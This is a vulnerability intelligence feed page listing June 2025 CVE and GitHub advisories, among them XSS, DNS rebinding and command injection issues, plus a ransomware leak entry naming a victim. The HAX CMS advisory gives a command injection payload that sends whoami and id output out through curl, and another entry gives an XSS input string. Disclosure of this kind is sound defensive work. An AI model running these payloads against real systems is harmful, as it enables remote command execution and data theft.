CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!

Threat and Vulnerability Intelligence Database

CVE-2025-5896

Description: A vulnerability was found in tarojs taro up to 4.1.1. It has been declared as problematic. This vulnerability affects unknown code of the file taro/packages/css-to-react-native/src/index.js. The manipulation leads to inefficient regular expression complexity. The attack can be initiated remotely. Upgrading to version 4.1.2 is able to address this issue. The name of the patch is c2e321a8b6fc873427c466c69f41ed0b5e8814bf. It is recommended to upgrade the affected component.

CVSS: MEDIUM (4.3)

EPSS Score: 0.05%

Source: CVE
June 9th, 2025 (13 days ago)

CVE-2025-49137

Description: HAX CMS PHP allows users to manage their microsite universe with a PHP backend. Prior to version 11.0.0, the application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The 'saveNode' and 'saveManifest' endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site. Although the application does not allow users to supply a `script` tag, it does allow the use of other HTML tags to run JavaScript. Version 11.0.0 fixes the issue.

CVSS: HIGH (8.5)

EPSS Score: 0.04%

Source: CVE
June 9th, 2025 (13 days ago)

CVE-2025-49004

Description: Caido is a web security auditing toolkit. Prior to version 0.48.0, due to the lack of protection for DNS rebinding, Caido can be loaded on an attacker-controlled domain. This allows a malicious website to hijack the authentication flow of Caido and achieve code execution. A malicious website loaded in the browser can hijack the locally running Caido instance and achieve remote command execution during the initial setup. Even if the Caido instance is already configured, an attacker can initiate the authentication flow by performing DNS rebinding. In this case, the victim needs to authorize the request on dashboard.caido.io. Users should upgrade to version 0.48.0 to receive a patch.

CVSS: HIGH (7.5)

EPSS Score: 0.21%

Source: CVE
June 9th, 2025 (13 days ago)

CVE-2024-22818

Description: FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/site/filterKeyword_save.

CVSS: HIGH (8.8)

EPSS Score: 0.09%

SSVC Exploitation: poc

Source: CVE
June 9th, 2025 (13 days ago)

CVE-2024-1026

Description: A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability.

CVSS: LOW (3.5)

EPSS Score: 0.05%

SSVC Exploitation: none

Source: CVE
June 9th, 2025 (13 days ago)

CVE-2024-0721

Description: A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.

CVSS: LOW (3.5)

EPSS Score: 0.16%

SSVC Exploitation: none

Source: CVE
June 9th, 2025 (13 days ago)
Description: Summary: The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The 'set_remote' function later passes this input into 'proc_open', yielding OS command injection.

Details: The vulnerability exists in the logic of the 'gitImportSite' function, located in 'Operations.php'. The current implementation relies only on the 'filter_var' and 'strpos' functions to validate the URL, which is not sufficient to ensure the absence of all Bash special characters used for command injection.

Affected Resources:
• Operations.php:2103 gitImportSite()
• //system/api/gitImportSite

PoC: To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note that a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').
1. Start a webserver.
2. Initiate a request to the 'archiveSite' endpoint.
3. Capture and modify the request in BurpSuite.
4. Observe command output in the HTTP request from the server.

Command Injection Payload: http:///.git;curl${IFS}/$(whoami)/$(id)#=abcdef

Impact: An authenticated attacker can craft a URL string that bypasses the validation checks employed by the 'filter_var' and 'strpos' functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.

References: https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw...
Source: Github Advisory Database (NPM)
June 9th, 2025 (13 days ago)
Description: During the opening keynote at Gartner Security & Risk Management Summit 2025, analysts weighed in on how CISOs and security teams can use security fervor around AI and other tech to the betterment of their security posture.
Source: Dark Reading
June 9th, 2025 (13 days ago)
Description: Impact: Pion Interceptor versions v0.1.36 through v0.1.38 contain a bug in an RTP packet factory that can be exploited to trigger a panic in a Pion-based SFU via crafted RTP packets. This only affects users that use pion/interceptor.

Patches: Upgrade to v0.1.39 or later, which includes PR #338. The PR validates that padLen > 0 && padLen <= payloadLength and returns an error on overflow, avoiding the panic. If upgrading is not possible, apply the patch from the pull request manually or drop packets whose P-bit is set but whose padLen is zero or larger than the remaining payload.

Workarounds: At the application layer, reject any RTP packet where hasPadding (P-bit field) == true && (padLen == 0 || padLen > packetLen - headerLen) before passing it to Pion's packet factories.

References:
• Commit fixing the bug: https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5
• Pull request: https://github.com/pion/interceptor/pull/338
• Issue: https://github.com/pion/webrtc/issues/3148
• Advisory: https://github.com/pion/interceptor/security/advisories/GHSA-f26w-gh5m-qq77
• https://github.com/advisories/GHSA-f26w-gh5m-qq77
Source: Github Advisory Database (Go)
June 9th, 2025 (13 days ago)
Description: San Jose Country Club is a premier family-friendly private golf club located in Northern California, established in 1899 and known for its rich tradition. The club offers year-round golf, dining options, and various social activities, making it a sought-after destination for members in the Bay Area. It features a newly remodeled clubhouse and event facilities for hosting weddings and special events. Catering to golf enthusiasts and families alike, the club emphasizes superior service and exclusive dining experiences. The company is headquartered at 15571 Alum Rock Ave, San Jose, CA 95127. The total amount of data leakage is 117.5 GB.
Source: Ransomware.live
June 9th, 2025 (13 days ago)